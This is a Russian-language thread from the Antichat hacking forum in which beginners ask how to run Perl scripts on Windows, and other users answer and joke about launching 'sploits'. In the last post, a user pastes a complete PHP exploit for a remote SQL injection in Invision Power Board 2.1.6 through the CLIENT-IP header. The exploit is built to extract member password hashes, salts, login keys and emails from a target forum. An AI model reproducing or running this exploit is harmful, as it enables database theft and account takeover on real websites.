ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Запуск Perl скрипта из командной строки
  #1  
Старый 17.11.2005, 21:25
Аватар для Prince_Dark
Prince_Dark
Новичок
Регистрация: 05.11.2005
Сообщений: 17
Провел на форуме:
118331

Репутация: 0
Отправить сообщение для Prince_Dark с помощью ICQ
По умолчанию Запуск Perl скрипта из командной строки

Помогите новечку. Почему у меня не запускается интерпритатор perl... Ну мне допустим надо запустить скрипт написанный на perl из командной строки я пишу например:

C:\>perl test.pl

Но мне сообщение

' perl ' is not recognized as an internal or external command, operable program or batch file

Хотелось бы узнать с чем ето связано?... и что сделать надо? чтоб всё работало....
 

  #2  
Старый 17.11.2005, 21:30
Аватар для RevenAnt
RevenAnt
Познающий
Регистрация: 08.04.2005
Сообщений: 69
Провел на форуме:
207537

Репутация: 59
По умолчанию

у тебя должен для начала быть установлен етот самый пёрл...
под винду к примеру юзают ActivePerl .... (ссылки даст любой поисковик)
 

  #3  
Старый 17.11.2005, 21:44
Аватар для Prince_Dark
Prince_Dark
Новичок
Регистрация: 05.11.2005
Сообщений: 17
Провел на форуме:
118331

Репутация: 0
Отправить сообщение для Prince_Dark с помощью ICQ
По умолчанию

О пасиб чувак большое.... теперь всё работает.
 

  #4  
Старый 25.12.2005, 19:40
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

А у меня не запкскается никогда таким вот
Цитата:
C:\>perl test.pl
макаром(пробовал однажды)
Приходится честно писать
Цитата:
C:\perl\bin\perl.exe C:\а_тут_сплойт\а_кроме_них_н _перле_нет_ниче.pl
 

  #5  
Старый 25.12.2005, 19:49
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

Мой компьютер => свойства => дополнительно => переменные среды => Path
 

  #6  
Старый 25.12.2005, 20:36
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

DRON а я ваще сразу sploit.pl запускаю и фсе=)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 

  #7  
Старый 26.12.2005, 14:48
Аватар для Ruax
Ruax
Новичок
Регистрация: 25.11.2005
Сообщений: 21
Провел на форуме:
49193

Репутация: 3
Отправить сообщение для Ruax с помощью ICQ
По умолчанию

Я поместил в папку Exploits у ся на тачке bat-файл такого содержания:

C:\WINDOWS\system32\cmd.exe

Делаем ярлык на bat файл на рабочий стол.
При открытии появляеца следущее:

E:\Exploits>C:\WINDOWS\system32\cmd.exe
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

E:\Exploits>

Вводим my_0day_sploit.pl и все

з.ы. тоже самое я проделал для nmap'a
 

  #8  
Старый 19.07.2007, 21:31
Аватар для ch[@]ch
ch[@]ch
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344

Репутация: 43
По умолчанию

сори за нупский вопрос....а как сохранить определеный скрипт в .pl и запустить его??и важен ли в какой директории она находится?
 

  #9  
Старый 20.07.2007, 08:50
Аватар для Alexsize
Alexsize
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375

Репутация: 4268


По умолчанию

Открываешь блокнот, всовываешь туда код на перле, жмакаешь сохранить как, даешь имя sploit.pl жмешь OK. Устанавливаешь Active Perl, копируешь свой сплоит в папку bin этого пакета, запускаешь cmd, идешь в папку bin и даешь команду perl sploit.pl
__________________
...
 

  #10  
Старый 20.07.2007, 11:55
Аватар для ch[@]ch
ch[@]ch
Banned
Регистрация: 21.06.2007
Сообщений: 87
Провел на форуме:
543344

Репутация: 43
По умолчанию

Цитата:
Сообщение от Alexsize  
Открываешь блокнот, всовываешь туда код на перле, жмакаешь сохранить как, даешь имя sploit.pl жмешь OK. Устанавливаешь Active Perl, копируешь свой сплоит в папку bin этого пакета, запускаешь cmd, идешь в папку bin и даешь команду perl sploit.pl
спасибо большое.....я сохранил все полусилось но вот не запускается =(((я вот этот скрипт хочу
PHP код:
<? 
## Invision Power Board <= 2.1.6 "CLIENT_IP" Remote SQL Injection Exploit 
## Coded by Cytech (hellknights.void.ru), Vulnerability by 1dt.w0lf (rst.void.ru) 

Error_Reporting(E_ALL & ~E_NOTICE); 
function 
SendExploit($host,$port,$exploit,$mode

        
$sock fsockopen($host,$port,$errno,$errstr); 
        if (!
$sock) echo "\ncant connect to remote server!"
    else 
    { 
       
fputs ($sock,$exploit); 
       while (!
feof($sock)) 
       { 
        
$y0=fgets($sock,9999); 
        if(
$mode == "geterror"
        { 
             echo(
htmlspecialchars($y0)); 
        } 
        
$j $j.$y0
       } 
    } 
        
fclose ($sock); 

    if(
$mode == "sqlinject"
    { 
        
$killhdr=substr($j,strpos($j,"session_id=")); 
        
$killhdz=substr($killhdr,0,strpos($killhdr,'path')  ); 
        
$res str_replace("session_id=""\nanswer="$killhdz); 
        echo 
htmlspecialchars($res); 
    } 


echo<<<
EOF 
<pre><center><h2>Invision Power Board 2.1.6 "CLIENT_IP" SQL-injection Exploit</h2>[ Coded by CytechVulnerability by 1dt.w0lf ]</center
<
form action="" method="post"
HOST:     <input name="host" size="20" value="hackme.ru">                 * hostname  
PORT
:     <input name="port" size="20" value="80">                 * httpd`s port 
PATH:     <input name="path" size="21" value="/index.php">                * path to forum
`s index.php 
USERID
:   <input name="uname" size="21" value="1">                * usernamewhich data you want to get 
PREFIX
:   <input name="prefix" size="21" value="ibf_">                * you can get prefix from error (click "geterror"
ROW:      <SELECT name="shellcode"
<
OPTION value="ip_address">ip_address (members)</OPTION
<
OPTION value="member_login_key">member_login_key (members)</OPTION
<
OPTION value="id">id (members)</OPTION
<
OPTION value="name">name (members)</OPTION
<
OPTION value="email">email (members)</OPTION
<
OPTION value="legacy_password">GET legacy_password (members)</OPTION
<
OPTION value="converge_pass_hash">converge_pass_hash (members_converge)</OPTION
<
OPTION value="converge_pass_salt">converge_pass_salt (members_converge)</OPTION
<
OPTION value="converge_email">converge_email (members_converge)</OPTION
</
SELECT> * row which you want to get (table
TABLE:<SELECT name="table">  
<
OPTION value="members">members</OPTION
<
OPTION value="members_converge">members_converge</OPTION
</
SELECT>                     * pleasechoose here table eq row which you selected before 
<input name="exploit" value="exploit IPB" type="submit">     <input name="geterror" value="check vulnerability & get prefix" type="submit"

[+] 
shellcode example:  ' UNION SELECT ip_address,0,0,0 FROM ibf_members WHERE id=1/*  
</form> 
EOF; 
            $host         =     $_POST['
host']; 
        $path         =     $_POST['
path']; 
               $port         =     $_POST['
port']; 
        $shellcode      =     $_POST['
shellcode']; 
        $dbprefix    =    $_POST['
prefix']; 
        $table        =    $_POST['
table']; 
        $uname        =    $_POST['
uname']; 

    echo "\n------------------------------------------------------------------\n"; 

if(!is_null($_POST['
exploit'])) 

    if($_POST['
table']=="members") $id = "id"; else $id = "converge_id"; 
    $injectcode = "' 
UNION SELECT ".$shellcode.",0,0,0 FROM ".$dbprefix.$table." WHERE ".$id."='".$uname."'/*"; 
    echo "[+] current used shellcode: $injectcode"; 
    $exploit  = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n". 
            "TE: deflate,gzip;q=0.3\r\n". 
            "Connection: TE, close\r\n". 
            "Host: ".$host."\r\n". 
            "User-Agent:\r\n". 
            "CLIENT-IP: ".$injectcode."\r\n\r\n"; 

    SendExploit($host,$port,$exploit,"sqlinject"); 


if(!is_null($_POST['geterror'])) 

    $injectcode = " 'technoid-attacker"; 
    echo "[+] current used shellcode: $injectcode"; 
    $exploit  = "GET ".$path."?s=technoid_attacker HTTP/1.1\r\n". 
            "TE: deflate,gzip;q=0.3\r\n". 
            "Connection: TE, close\r\n". 
              "Host: ".$host."\r\n". 
            "User-Agent:\r\n". 
            "CLIENT-IP: ".$injectcode."\r\n\r\n"; 
    SendExploit($host,$port,$exploit,"geterror"); 


    echo "\n------------------------------------------------------------------\n"; 
    echo "</pre>"; 
?>
а он говорит
Цитата:
Unterminated <> operator at C:\Perl\bin\sploit.pl line 1.
че делать??можешь аську дать пожалуйста?
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Основные команды командной строчки. silveran Windows 5 27.10.2005 14:45
Books Perl FRAGNATIC PHP, PERL, MySQL, JavaScript 0 11.08.2005 16:58
Безопасность приложений на Perl k00p3r Чужие Статьи 0 12.06.2005 09:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ